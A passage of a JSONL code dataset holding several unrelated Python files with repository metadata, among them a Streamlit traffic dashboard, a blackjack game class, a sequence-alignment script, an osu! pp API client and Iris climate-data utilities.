5, 30)\nKIND_SHIELD = (32, 0, \"Shield\", 5, 50)\nKIND_SWORD = (48, 0, \"Sword\", 5, 75)\nKIND_HELMET = (48, 16, \"Helmet\", 5, 100)\nKIND_APPLE = (0, 16, \"Apple\", 5 ,125)\nKIND_BOW = (16, 16, \"Bow\", 25, 10)\nKIND_DIAMOND = (32, 16, \"Diamond\", 25, 30)\n\nMAX_AMOUNT = 8\nMIN_AMOUNT = 1\nMAX_KIND = 5\n\nSE_ERROR = 0\nSE_SELECT = 5\nMUSIC_ADD = 0\nMUSIC_USE = 1\nMUSIC_BGM = 2","repo_name":"leocody/RPG_Inventory","sub_path":"constant.py","file_name":"constant.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"21625726977","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\nimport streamlit as st\nimport pandas as pd\nimport numpy as np\nimport datetime\nimport plotly.express as px\n\n\ndef app():\n\n    #import dataset\n    df= pd.read_excel('C:/Users/HP/Downloads/ByWeekSearchRealTraffic.xlsx')\n\n    #FILTER\n    st.sidebar.header('FILTERS')\n\n    #filter years\n    years = list(df['Year'].drop_duplicates())\n
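    # each sidebar filter narrows df in place, so later filters and the charts below only see the rows kept by earlier selections\n    year_choice = 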
st.sidebar.multiselect('Choose the year(s):', years, default=years)\n df = df[df['Year'].isin(year_choice)]\n\n #filter destination\n destinations = list(df['Destination'].drop_duplicates())\n destination_choice = st.sidebar.multiselect('Choose the destination(s):', destinations, default=destinations)\n df = df[df['Destination'].isin(destination_choice)]\n\n #filter airport\n airports = list(df['Airport'].drop_duplicates())\n airport_choice = st.sidebar.multiselect('Choose the airport(s):', airports, default=airports)\n df = df[df['Airport'].isin(airport_choice)]\n\n #filter directionality\n directionalities = list(df['Directionality'].drop_duplicates())\n directionality_choice = st.sidebar.multiselect('Choose the directionality(ies):', directionalities, default=directionalities)\n df = df[df['Directionality'].isin(directionality_choice)]\n\n\n st.markdown('## Comparative Real Air Traffic / Skyscanner Searches')\n st.markdown(\"### - By weeks\")\n df['diff'] = df['RealTraffic/RealTraffic2019'] - df['Searches/Searches2019']\n \n #KPIs\n st.markdown(\"#### Some KPIs\")\n st.markdown('The percentage difference between the number of searches for a travel date and the number of passengers for that travel date')\n\n chart_data = pd.DataFrame(df[[\"NumWeek\",\"diff\"]].groupby(['NumWeek']).sum().add_suffix('').reset_index())\n col1, col2, col3 = st.columns(3)\n col1.metric(\"Mean (en %)\", round(chart_data[\"diff\"].mean(),2))\n col2.metric(\"Max (en %)\", round(chart_data[\"diff\"].max(),2))\n col3.metric(\"Min (en %)\", round(chart_data[\"diff\"].min(),2))\n\n #chart line by weeks\n st.markdown('#### Real Air Traffic - Skyscanner Searches compared to Real Air Traffic - Skyscanner Searches 2019 ')\n #chart line by days\n chart_data = pd.DataFrame(df[[\"NumWeek\",\"RealTraffic/RealTraffic2019\",\"Searches/Searches2019\",\"RealTraffic-Searches 2019\"]].groupby(['NumWeek']).mean().add_suffix('').reset_index())\n chart_data = chart_data.rename(columns={\"RealTraffic/RealTraffic2019\": \"Real Traffic compared to 2019 Real Air Traffic\", \"Searches/Searches2019\": \"Searches compared to 2019 Searches\", \"RealTraffic-Searches 2019\" : \"Real Traffic and Searches 2019\"})\n chart_data = px.line(chart_data, x=\"NumWeek\", y=[\"Real Traffic compared to 2019 Real Air Traffic\",\"Searches compared to 2019 Searches\",\"Real Traffic and Searches 2019\"], labels=dict(NumWeek=\"Week Travel\"))\n chart_data = chart_data.update_xaxes(range=[1, 53])\n chart_data = chart_data.update_layout(legend=dict(yanchor=\"top\",y=0.99,xanchor=\"left\",x=0.01))\n st.plotly_chart(chart_data)\n\n\n st.markdown(\"### - By months\")\n df1= pd.read_excel('C:/Users/HP/Downloads/searchdirectsmonth.xlsx')\n\n #KPIs\n st.markdown(\"#### Some KPIs\")\n st.markdown('The percentage difference between the number of searches for a travel date and the number of passengers for that travel date')\n\n df1['diff'] = df1['RealTraffic%2019ByMonth'] - df1['Searches%2019ByMonth']\n chart_data = pd.DataFrame(df1[[\"Month\",\"diff\"]].groupby(['Month']).sum().add_suffix('').reset_index())\n col1, col2, col3 = st.columns(3)\n col1.metric(\"Mean (en %)\", round(chart_data[\"diff\"].mean(),2))\n col2.metric(\"Max (en %)\", round(chart_data[\"diff\"].max(),2))\n col3.metric(\"Min (en %)\", round(chart_data[\"diff\"].min(),2))\n\n #chart line by weeks\n st.markdown('#### Real Air Traffic - Skyscanner Searches compared to Real Air Traffic - Skyscanner Searches 2019 ')\n #chart line by days\n chart_data = 
pd.DataFrame(df1[[\"Month\",\"RealTraffic%2019ByMonth\",\"Searches%2019ByMonth\",\"Total Real Traffic / Searches 2019\"]].groupby(['Month']).mean().add_suffix('').reset_index())\n chart_data = chart_data.rename(columns={\"RealTraffic%2019ByMonth\": \"Real Traffic compared to 2019 Real Air Traffic\", \"Searches%2019ByMonth\": \"Searches compared to 2019 Searches\", \"Total Real Traffic / Searches 2019\" : \"Real Traffic and Searches 2019\"})\n chart_data = px.line(chart_data, x=\"Month\", y=[\"Real Traffic compared to 2019 Real Air Traffic\",\"Searches compared to 2019 Searches\",\"Real Traffic and Searches 2019\"], labels=dict(Month=\"Month Travel\"))\n chart_data = chart_data.update_xaxes(range=[1, 12])\n chart_data = chart_data.update_layout(legend=dict(yanchor=\"top\",y=0.99,xanchor=\"left\",x=0.01))\n st.plotly_chart(chart_data)\n\n\n\n st.markdown(\"### - By holidays\")\n\n df1= pd.read_excel('C:/Users/HP/Downloads/Searchesdirectsholidays.xlsx')\n df1['diff'] = df1['Real Traffic'] - df1['Searches']\n \n #KPIs\n st.markdown(\"#### Some KPIs\")\n st.markdown('The percentage difference between the number of searches for a travel date and the number of passengers for that travel date')\n\n chart_data = pd.DataFrame(df1[[\"VacancesZoneC\",\"diff\"]].groupby(['VacancesZoneC']).sum().add_suffix('').reset_index()) \n col1, col2, col3 = st.columns(3)\n col1.metric(\"Mean (en %)\", round(chart_data[\"diff\"].mean(),2))\n col2.metric(\"Max (en %)\", round(chart_data[\"diff\"].max(),2))\n col3.metric(\"Min (en %)\", round(chart_data[\"diff\"].min(),2))\n\n #chart line by weeks\n st.markdown('#### Real Air Traffic - Skyscanner Searches compared to Real Air Traffic - Skyscanner Searches 2019 ')\n #chart line by days\n chart_data = pd.DataFrame(df1[[\"VacancesZoneC\",\"Real Traffic\",\"Searches\",\"Total Real Traffic / Searches 2019\"]].groupby(['VacancesZoneC']).mean().add_suffix('').reset_index())\n chart_data = chart_data.rename(columns={\"Real Traffic\": \"Real Traffic compared to 2019 Real Air Traffic\", \"Searches\": \"Searches compared to 2019 Searches\", \"Total Real Traffic / Searches 2019\" : \"Real Traffic and Searches 2019\"})\n chart_data = px.line(chart_data, x=\"VacancesZoneC\", y=[\"Real Traffic compared to 2019 Real Air Traffic\",\"Searches compared to 2019 Searches\",\"Real Traffic and Searches 2019\"], labels=dict(VacancesZoneC=\"Holidays Travel\"))\n chart_data = chart_data.update_layout(legend=dict(yanchor=\"top\",y=0.99,xanchor=\"left\",x=0.01))\n st.plotly_chart(chart_data)\n \n\n \n\n\n\n\n\n\n","repo_name":"OlfaLmt/StreamlitProject","sub_path":"StreamlitProject/StreamlitProject4.py","file_name":"StreamlitProject4.py","file_ext":"py","file_size_in_byte":6405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40701154598","text":"import Player\r\nclass Round(object):\r\n \"\"\"description of class\"\"\"\r\n players = None\r\n deck = []\r\n bets = {}\r\n scores = {}\r\n dealer = None\r\n\r\n def __init__(self, players, deck):\r\n self.players = players\r\n self.deck = deck\r\n \r\n for player in self.players:\r\n self.bets[player] = 0\r\n self.scores[player] = 0\r\n if player.is_dealer:\r\n self.dealer = player\r\n\r\n def play_out_round(self):\r\n self.place_bets()\r\n self.initial_deal()\r\n\r\n for player in self.players:\r\n print(player.name + \"(bet = \" + str(self.bets[player]) + \"): \" + str(player.hand) + \": \" + str(player.compute_hand_total()))\r\n\r\n self.continue_round()\r\n\r\n self.dealers_turn()\r\n 
\r\n        for player in self.players:\r\n            print(player.name + \": \" + str(player.hand) + \": \" + str(player.compute_hand_total()))\r\n\r\n        self.determine_payouts()\r\n\r\n        self.reset()\r\n\r\n    def initial_deal(self):\r\n        for player in self.players:\r\n            player.deal_shown_card(self.deck)\r\n\r\n        for player in self.players:\r\n            if not player.is_dealer:\r\n                player.deal_shown_card(self.deck)\r\n            else:\r\n                player.deal_hidden_card(self.deck)\r\n\r\n    def continue_round(self):\r\n        for player in self.players:\r\n            while not player.hold and not player.is_dealer and not player.over:\r\n                if player.hand_can_split():\r\n                    split_status = input(player.name + \", your hand is: \" + str(player.hand) + \". With a total value of: \" + str(player.hand_total) + \". Split? (Y/N)\\r\\n\")\r\n                    if split_status.capitalize() == \"Y\":\r\n                        player.split(self.bets[player], self.deck) #TODO\r\n                else:\r\n                    self.scores[player] = player.manual_play(self.deck) #TODO\r\n                    player.hold = True\r\n\r\n    def continue_round_optimally(self):\r\n        for player in self.players:\r\n            if not player.is_dealer and not player.over:\r\n                return\r\n\r\n    def optimal_hit_or_stay(self, player):\r\n        dealer = self.dealer\r\n        shown_card = dealer.hand[0][0]\r\n        if player.hand_is_hard():\r\n            return #TODO\r\n\r\n    def dealers_turn(self):\r\n        dealer = self.dealer\r\n        dealer.show_hidden_card()\r\n        while not dealer.hold and not dealer.over:\r\n            hit_status = input(dealer.name + \", your hand is: \" + str(dealer.hand) + \". With a total value of: \" + str(dealer.compute_hand_total()) + \". Hit or stay? (H/S)\\r\\n\")\r\n            if hit_status.capitalize() == \"H\":\r\n                dealer.deal_shown_card(self.deck)\r\n                if dealer.over:\r\n                    print(dealer.name + \", you went over with a hand of: \" + str(dealer.hand))\r\n            else:\r\n                print(dealer.name + \", you are staying with a hand total of: \" + str(dealer.compute_hand_total()))\r\n                dealer.hold = True\r\n        self.scores[self.dealer] = self.dealer.compute_hand_total()\r\n    \r\n\r\n    def determine_payouts(self):\r\n        for player in self.players:\r\n            if not player.is_dealer:\r\n                if (self.scores[player] > self.scores[self.dealer] and not player.over) or (not player.over and self.dealer.over):\r\n                    player.wins(self.bets[player])\r\n                    print(player.name + \" has won \" + str(self.bets[player]) + \" dollars.\")\r\n                elif (self.scores[player] == self.scores[self.dealer] and not player.over):\r\n                    player.pushes(self.bets[player])\r\n                    print(\"PUSH! \" + player.name + \" has tied and is returned their bet of \" + str(self.bets[player]) + \" dollars.\")\r\n                else:\r\n                    print(player.name + \" has lost \" + str(self.bets[player]) + \" dollars.\")\r\n\r\n    def place_bets(self):\r\n        for player in self.players:\r\n            if not player.is_dealer:\r\n                self.bets[player] = player.place_bet()\r\n\r\n    def reset(self):\r\n        for player in self.players:\r\n            player.reset()","repo_name":"nhomka/Blackjack-Card-Counting","sub_path":"Round.py","file_name":"Round.py","file_ext":"py","file_size_in_byte":4116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43455214075","text":"from django.conf import settings\nfrom django.core.mail import EmailMultiAlternatives\nfrom .models import User\n\n\ndef _send_email_registrations(\n    registration_subject: str,\n    text_content: str,\n    html_content: str,\n    from_email: str,\n    email_list: list,\n    bcc_email: str,\n) -> None:\n    \"\"\"\n    send email registration notification\n    \"\"\"\n    if not settings.EMAIL_SEND:\n        return \"mocking email sending\"\n    msg = EmailMultiAlternatives(\n        registration_subject, text_content, from_email, email_list, bcc=bcc_email\n    )\n    msg.attach_alternative(html_content, \"text/html\")\n    msg.send()\n\n\ndef _check_user_if_in_platform(email: str) -> bool:\n    \"\"\"\n    checks if user exists\n    \"\"\"\n    return User.objects.filter(email=email).exists()\n","repo_name":"ausome-maps/TherapEase","sub_path":"api/apps/core/users/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"34332713920","text":"import numpy as np\n\nseq1 = 'RGSRRPGQPP'\nseq2 = 'RGQGRRWRPP'\n\nmainm = np.zeros((len(seq1)+1, len(seq2)+1))\nmatchm = np.zeros((len(seq1), len(seq2)))\n\nreward = 1\nmism = -1\ngappen = -2\n\nfor i in range(len(seq1)):\n    for j in range(len(seq2)):\n        if seq1[i] == seq2[j]:\n            matchm[i][j] = reward\n        else:\n            matchm[i][j] = mism\n\n#init\nfor i in range(len(seq1)+1):\n    mainm[i][0] = i*gappen\nfor j in range(len(seq2)+1):\n    mainm[0][j] = j*gappen\n#fill\nfor i in range(1, len(seq1)+1):\n    for j in range(1, len(seq2) + 1):\n        mainm[i][j] = max(mainm[i-1][j-1]+matchm[i-1][j-1],\n                          mainm[i-1][j]+gappen,\n                          mainm[i][j-1]+gappen)\n#traceback\nal_seq1 = ''\nal_seq2 = ''\nls1 = len(seq1)\nls2 = len(seq2)\n\nwhile ls1>0 or ls2>0:  # walk back until both sequences are fully consumed\n    if ls1>0 and ls2>0 and mainm[ls1][ls2] == mainm[ls1-1][ls2-1] + matchm[ls1-1][ls2-1]:\n        al_seq1 = seq1[ls1-1] + al_seq1\n        al_seq2 = seq2[ls2-1] + al_seq2\n        ls1 -= 1\n        ls2 -= 1\n    elif ls1>0 and mainm[ls1][ls2] == mainm[ls1-1][ls2] + gappen:\n        al_seq1 = seq1[ls1 - 1] + al_seq1\n        al_seq2 = \"_\" + al_seq2\n        ls1 -= 1\n    else:\n        al_seq1 = \"_\" + al_seq1\n        al_seq2 = seq2[ls2 - 1] + al_seq2\n        ls2 -= 1\n\nprint(al_seq1)\nprint(al_seq2)\n\n\n","repo_name":"liquidbrainisstrain/ouroboros","sub_path":"ouroboros/nw-alg.py","file_name":"nw-alg.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38674478922","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDecide the range of leaf numbers that need to open based on the input fs\n\"\"\"\n__author__ = 'Kanru Xie'\n\nimport globalvar as glv\n\n\ndef mlc_open_leaves():\n    mlc_y = glv.convert_float('mlc y')\n    global open_l, open_r\n    '''\n    Had issues with the initial leaf numbers. 
\n open_l should start from 30 and 46, open_r should start from 31 and 15\n '''\n if 0 <= mlc_y < 8: # Center quarter leaves cover 8cm in total.\n open_l = 30 + int((mlc_y / 2) // 0.25) # Leaf number on left side of open field.\n open_r = 31 - int((mlc_y / 2) // 0.25) # Leaf number on right side of open field.\n elif 8 <= mlc_y < 21: # Half leaves take from 4cm to 10.5cm on one side.\n open_l = 46 + int(((mlc_y / 2) - 4) // 0.5)\n open_r = 15 - int(((mlc_y / 2) - 4) // 0.5)\n else: # The rest 0.5cm on each side are outboard leaves.\n open_l = 60\n open_r = 1\n\n\ndef mlc_open_distance(leaf_number): # either half of x- opening (opened), or 0 (closed).\n mlc_x = glv.convert_float('mlc x')\n # mlc_x is the size of the open field at 100cm ssd\n # while x_distance is the actual mlc movement in space at 51cm ssd\n x_distance = ''\n mlc_open_leaves()\n if open_r <= (leaf_number % 100) <= open_l: # 2 banks, leaves numbered as 1xx and 2xx.\n if leaf_number // 100 == 1: # Bank 1 moves in +x direction\n x_distance = mlc_x * 51 / 200\n elif leaf_number // 100 == 2: # Bank 2 moves in -x direction\n x_distance = - mlc_x * 51 / 200\n else:\n x_distance = 0\n # out of field leaves, closed\n return x_distance\n","repo_name":"UToledoVLinac/Virtual_Linac","sub_path":"main/input_file_creator/write_cell_card/mlc_open.py","file_name":"mlc_open.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70037869352","text":"'''\nThe parameter weekday is True if it is a weekday, and the parameter vacation is True if we are on vacation.\nWe sleep in if it is not a weekday or we're on vacation. Return True if we sleep in.\n'''\ndef sleep_in(weekday, vacation):\n if (weekday is False and vacation is False):\n return True\n elif (weekday is True and vacation is False):\n return False\n elif (weekday is False and vacation is True):\n return True\n elif (weekday is True and vacation is True):\n return True\n \n \n'''\nWe have two monkeys, a and b, and the parameters a_smile and b_smile indicate if each is smiling.\nWe are in trouble if they are both smiling or if neither of them is smiling. Return True if we are in trouble.\n'''\ndef monkey_trouble(a_smile, b_smile):\n if (a_smile is b_smile):\n return True\n else:\n return False \n \n \n'''\nGiven two int values, return their sum. Unless the two values are the same, then return double their sum.\n'''\ndef sum_double(a, b):\n if (a != b):\n return a + b\n else:\n return (a + b) * 2 \n \n \n'''\nGiven an int n, return the absolute difference between n and 21, except return double the absolute difference if n is over 21.\n'''\ndef diff21(n):\n if (n <= 21):\n return (abs(n - 21))\n else:\n return (abs(n - 21)) * 2\n \n \n'''\nWe have a loud talking parrot. The \"hour\" parameter is the current hour time in the range 0..23.\nWe are in trouble if the parrot is talking and the hour is before 7 or after 20. Return True if we are in trouble.\n'''\ndef parrot_trouble(talking, hour):\n if (talking is True and (hour < 7 or hour > 20)):\n return True\n else:\n return False\n \n \n'''\nGiven 2 ints, a and b, return True if one if them is 10 or if their sum is 10.\n'''\ndef makes10(a, b):\n if (a == 10 or b == 10 or a + b == 10):\n return True\n else:\n return False \n \n \n'''\nGiven an int n, return True if it is within 10 of 100 or 200. 
Note: abs(num) computes the absolute value of a number.\n'''\ndef near_hundred(n):\n a = 100 - n\n b = 200 - n\n return abs(a) <= 10 or abs(b) <= 10\n \n \n'''\nGiven 2 int values, return True if one is negative and one is positive.\nExcept if the parameter \"negative\" is True, then return True only if both are negative.\n'''\ndef pos_neg(a, b, negative):\n if (a < 0 and b >= 0 and negative is not True):\n return True\n elif (b < 0 and a >= 0 and negative is not True):\n return True\n elif (a < 0 and b < 0 and negative is True):\n return True\n else:\n return False\n \n \n'''\nGiven a string, return a new string where \"not \" has been added to the front.\nHowever, if the string already begins with \"not\", return the string unchanged.\n'''\ndef not_string(str):\n if (str[:3] == 'not'):\n return str\n else:\n return 'not ' + str;\n \n \n'''\nGiven a non-empty string and an int n, return a new string where the char at index n has been removed.\nThe value of n will be a valid index of a char in the original string (i.e. n will be in the range 0..len(str)-1 inclusive).\n'''\ndef missing_char(st, n):\n if (n == 0):\n return st[1:]\n else:\n return st[0:n] + st[n + 1:]\n \n \n'''\nGiven a string, return a new string where the first and last chars have been exchanged.\n'''\ndef front_back(str):\n if (len(str) == 1 or len(str) == 0):\n return str\n elif (len(str) == 2):\n return str[-1] + str[0]\n else:\n return str[-1] + str[1:-1] + str[0]\n \n\n'''\nGiven a string, we'll say that the front is the first 3 chars of the string.\nIf the string length is less than 3, the front is whatever is there.\nReturn a new string which is 3 copies of the front.\n'''\ndef front3(str):\n if (len(str) >= 3):\n return str[:3] * 3\n else:\n return str * 3\n","repo_name":"insotriplesix/dp","sub_path":"challenges/coding-bat/python/warmup-1.py","file_name":"warmup-1.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"14167389848","text":"try:\n import ujson as json\nexcept ImportError:\n import json\nimport json as stdjson\nimport logging\nfrom typing import Dict, Any, List, Union, Optional\n\nimport aiohttp\nimport async_timeout\n\nfrom constants.game_modes import GameMode\nfrom constants.mods import Mod\n\n\nclass LetsApiError(Exception):\n pass\n\n\nclass FatalLetsApiError(LetsApiError):\n pass\n\n\nclass LetsPPResponse:\n def __init__(self, **kwargs):\n self.song_name: str = kwargs[\"song_name\"]\n self._pp: Union[List[float], float] = kwargs[\"pp\"]\n self.length: int = kwargs[\"length\"]\n self.stars: float = kwargs[\"stars\"]\n self.ar: float = kwargs[\"ar\"]\n self.bpm: int = kwargs[\"bpm\"]\n self.mods: Mod = kwargs[\"mods\"]\n self.accuracy: Optional[float] = kwargs[\"accuracy\"]\n self.game_mode: GameMode = GameMode(kwargs[\"game_mode\"])\n\n @property\n def has_multiple_pp(self) -> bool:\n return type(self._pp) is list\n\n @property\n def pp(self) -> float:\n if self.has_multiple_pp:\n raise ValueError(\"This response has multiple PP. 
Please use pp_100, pp_99, pp_98 or pp_95.\")\n return self._pp\n\n @property\n def pp_100(self) -> float:\n return self._pp[0] if self.has_multiple_pp else self._pp\n\n @property\n def pp_99(self) -> float:\n return self._pp[1] if self.has_multiple_pp else None\n\n @property\n def pp_98(self) -> float:\n return self._pp[2] if self.has_multiple_pp else None\n\n @property\n def pp_95(self) -> float:\n return self._pp[3] if self.has_multiple_pp else None\n\n # @property\n # def primary_game_mode(self) -> GameMode:\n # return next((GameMode(i) for v, i in enumerate(self._pp) if v is not None and v > 0), GameMode.STANDARD)\n\n @property\n def modded_ar(self) -> float:\n if self.mods & Mod.EASY:\n return max(0.0, self.ar / 2)\n if self.mods & Mod.HARD_ROCK:\n return min(10.0, self.ar * 1.4)\n return self.ar\n\n def __str__(self) -> str:\n message = f\"{self.song_name}\"\n message += f\" <{str(self.game_mode)}>\"\n message += f\"+{str(self.mods)}\" if self.mods != Mod.NO_MOD else \"\"\n message += \" \"\n if self.has_multiple_pp:\n message += \" | \".join(f\"{perc}%: {x:.2f}pp\" for perc, x in zip((100, 99, 98, 95), self._pp))\n else:\n message += f\"{self.accuracy:.2f}%: {self.pp:.2f}pp\"\n original_ar = self.ar\n mod_ar = self.modded_ar\n message += \\\n f\" | ♪ {self.bpm}\" \\\n f\" | AR {self.ar}{f' ({mod_ar:.2f})' if mod_ar != original_ar else ''}\" \\\n f\" | ★ {self.stars:.2f}\"\n return message\n\n\nclass LetsApiClient:\n logger = logging.getLogger(\"lets_api\")\n\n def __init__(self, base: str, timeout: int = 5):\n self.base = base.rstrip(\"/\")\n self.timeout = timeout\n\n async def _request(self, url: str, params: Dict[str, Any]) -> Dict[Any, Any]:\n url = url.lstrip(\"/\")\n async with aiohttp.ClientSession() as session:\n with async_timeout.timeout(self.timeout):\n async with session.get(f\"{self.base}/{url}\", params=params) as response:\n try:\n self.logger.debug(f\"LETS request: GET {self.base}/{url} [{params}]\")\n return await response.json(loads=json.loads)\n except (ValueError, stdjson.JSONDecodeError):\n raise FatalLetsApiError(response)\n\n async def get_pp(\n self, beatmap_id: int,\n game_mode: GameMode = GameMode.STANDARD,\n mods: Mod = Mod.NO_MOD,\n accuracy: float = None\n ) -> LetsPPResponse:\n params = {\"b\": beatmap_id, \"m\": int(mods), \"g\": int(game_mode)}\n if accuracy is not None:\n params[\"a\"] = str(accuracy)\n r = await self._request(\"v1/pp\", params)\n status = r.get(\"status\")\n if status != 200:\n exc_info = r[\"message\"] if \"message\" in r else r\n self.logger.error(f\"LETS api error: {exc_info}\")\n raise LetsApiError(exc_info)\n self.logger.debug(r)\n return LetsPPResponse(**r, mods=mods, accuracy=accuracy)\n\n","repo_name":"xnyo/fokabot","sub_path":"utils/letsapi.py","file_name":"letsapi.py","file_ext":"py","file_size_in_byte":4195,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"17547574000","text":"from django import forms\nfrom .models import Image\n\nfrom imagekit.forms import ProcessedImageField\nfrom imagekit.processors import Transpose, Anchor, ResizeToFit\n\nclass NameForm(forms.Form):\n first_name = forms.CharField(label='Your first name', max_length=100)\n last_name = forms.CharField(label='Your last name', max_length=100)\n\nclass ImageForm(forms.ModelForm):\n image = ProcessedImageField(spec_id='mysite:htmx_fragments:image',\n processors=[\n Transpose(), # wipes meta to prevent rotation\n ResizeToFit(width=1920,height=1080,upscale=False,anchor=Anchor.CENTER),\n ],\n 
format='WEBP',\n                                options={'quality': 75})\n    class Meta:\n        model = Image\n        fields = \"__all__\"\n","repo_name":"tpmac1990/django-svelte-rollup-multi-entrypoints","sub_path":"mysite/htmx_fragments/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"19563032287","text":"########################################################################\n # TIME AND AREA OPERATIONS\n # V.Predoi, University of Reading, May 2017\n########################################################################\nimport iris\n\n# slice cube over a restricted time period\ndef time_slice(mycube,yr1,mo1,d1,yr2,mo2,d2):\n    \"\"\"\n    Function that returns a subset of the original cube (slice)\n    given two dates of interest date1 and date2\n    date1 and date2 should be given in a yr,mo,d (int) format e.g.\n    time_slice(cube,2006,2,2,2010,1,1) or time_slice(cube,'2006','2','2','2010','1','1');\n    Returns a cube\n    \"\"\"\n    import datetime\n    import iris.unit\n    myDate1 = datetime.datetime(int(yr1),int(mo1),int(d1))\n    myDate2 = datetime.datetime(int(yr2),int(mo2),int(d2))\n    t1 = mycube.coord('time').units.date2num(myDate1)\n    t2 = mycube.coord('time').units.date2num(myDate2)\n    myConstraint = iris.Constraint(time=lambda t: t.point > t1 and t.point < t2)\n    cubeslice = mycube.extract(myConstraint)\n    return cubeslice\n\n# slice cube over a restricted area (box)\ndef area_slice(mycube, long1, long2, lat1, lat2):\n    \"\"\"\n    Function that subsets a cube on a box (long1,long2,lat1,lat2)\n    This function is a restriction of masked_cube_lonlat();\n    Returns a cube\n    \"\"\"\n    sublon = iris.Constraint(longitude=lambda cell: float(long1) <= cell <= float(long2))\n    sublat = iris.Constraint(latitude=lambda cell: float(lat1) <= cell <= float(lat2))\n    region_subset = mycube.extract(sublon & sublat)\n    return region_subset\n\n# get the time average\ndef time_average(mycube):\n    \"\"\"\n    Function to get the time average over MEAN;\n    Returns a cube\n    \"\"\"\n    var_mean = mycube.collapsed('time', iris.analysis.MEAN)\n    return var_mean\n\n# get the probability a value is greater than a threshold\ndef proportion_greater(mycube, coord1, threshold):\n    \"\"\"\n    Function that returns the probability\n    that a certain variable coord1 (string) is greater than\n    a threshold threshold (float or string), across a cube mycube;\n    Returns a cube\n    \"\"\"\n    thr = float(threshold)\n    result = mycube.collapsed(coord1, iris.analysis.PROPORTION,\n                              function=lambda values: values > thr)\n    return result\n\n# get zonal means\ndef zonal_means(mycube, coord1, mean_type):\n    \"\"\"\n    Function that returns zonal means along a coordinate coord1;\n    the type of mean is controlled by mean_type variable (string):\n    'mean' -> MEAN\n    'stdev' -> STD_DEV\n    'variance' -> VARIANCE\n\n    Returns a cube\n    \"\"\"\n    if mean_type=='mean':\n        result = mycube.collapsed(coord1, iris.analysis.MEAN)\n    elif mean_type=='stdev':\n        result = mycube.collapsed(coord1, iris.analysis.STD_DEV)\n    elif mean_type=='variance':\n        result = mycube.collapsed(coord1, iris.analysis.VARIANCE)\n    return result\n\n# get the area average\ndef area_average(mycube, coord1, coord2):\n    \"\"\"\n    Function that determines the area average\n    Can be used with coord1 and coord2 (strings,\n    usually 'longitude' and 'latitude' but depends on the cube);\n    Returns a cube\n    \"\"\"\n    import iris.analysis.cartography\n    mycube.coord(coord1).guess_bounds()\n    mycube.coord(coord2).guess_bounds()\n
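    # area_weights() needs bounds on both coordinates, hence the guess_bounds() calls above\n    grid_areas = 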
iris.analysis.cartography.area_weights(mycube)\n result = mycube.collapsed([coord1, coord2], iris.analysis.MEAN, weights=grid_areas)\n return result\n\n# get the seasonal mean\ndef seasonal_mean(mycube):\n \"\"\"\n Function to compute seasonal means with MEAN\n Chunks time in 3-month periods and computes means over them;\n Returns a cube\n \"\"\"\n import iris.coord_categorisation\n iris.coord_categorisation.add_season(mycube, 'time', name='clim_season')\n iris.coord_categorisation.add_season_year(mycube, 'time', name='season_year')\n annual_seasonal_mean = mycube.aggregated_by(['clim_season', 'season_year'], iris.analysis.MEAN)\n spans_three_months = lambda time: (time.bound[1] - time.bound[0]) == 2160\n three_months_bound = iris.Constraint(time=spans_three_months)\n return annual_seasonal_mean.extract(three_months_bound)\n\n# operate along a trajectory line\ndef trajectory_cube(mycube, long1, long2, lat1, lat2, plong1, plong2, plat1, plat2,samplecounts):\n \"\"\"\n Function that subsets a cube on a box (long1,long2,lat1,lat2)\n then creates a trajectory with waypoints (plong1,plong2,plat1, plat2),\n populates it with samplecounts number of points\n and subsets the cube along the trajectory\n \"\"\"\n from iris.analysis import trajectory\n sublon = iris.Constraint(longitude=lambda cell: float(long1) <= cell <= float(long2))\n sublat = iris.Constraint(latitude=lambda cell: float(lat1) <= cell <= float(lat2))\n wspd_subset = mycube.extract(sublon & sublat)\n pnts = [{'longitude': float(plong1), 'latitude': float(plat1)}, {'longitude': float(plong2), 'latitude': float(plat2)}]\n traj = trajectory.Trajectory(pnts, sample_count=int(samplecounts))\n lon = [d['longitude'] for d in traj.sampled_points]\n lat = [d['latitude'] for d in traj.sampled_points]\n sampled_points = [('longitude', lon),('latitude', lat)]\n section = trajectory.interpolate(wspd_subset, sampled_points)\n lon, lat = wspd_subset.coord('longitude').points, wspd_subset.coord('latitude').points\n return section, lon, lat\n","repo_name":"valeriupredoi/ESMValToolCodes","sub_path":"time_area_ops_suite.py","file_name":"time_area_ops_suite.py","file_ext":"py","file_size_in_byte":5316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41456546859","text":"#\n# @lc app=leetcode id=238 lang=python3\n#\n# [238] Product of Array Except Self\n#\n\n\nclass Solution:\n def productExceptSelf(self, nums: List[int]) -> List[int]:\n\n left = [1]\n\n right = [1]\n\n length = len(nums)\n\n temp = length-1\n\n for i in range(temp):\n\n left.append(left[-1]*nums[i])\n right.append(right[-1]*nums[temp-i])\n\n ans = list()\n for i in range(length):\n\n ans.append(left[i]*right[temp-i])\n\n return ans\n","repo_name":"HOZH/leetCode","sub_path":"leetCodePython/238.product-of-array-except-self.py","file_name":"238.product-of-array-except-self.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} 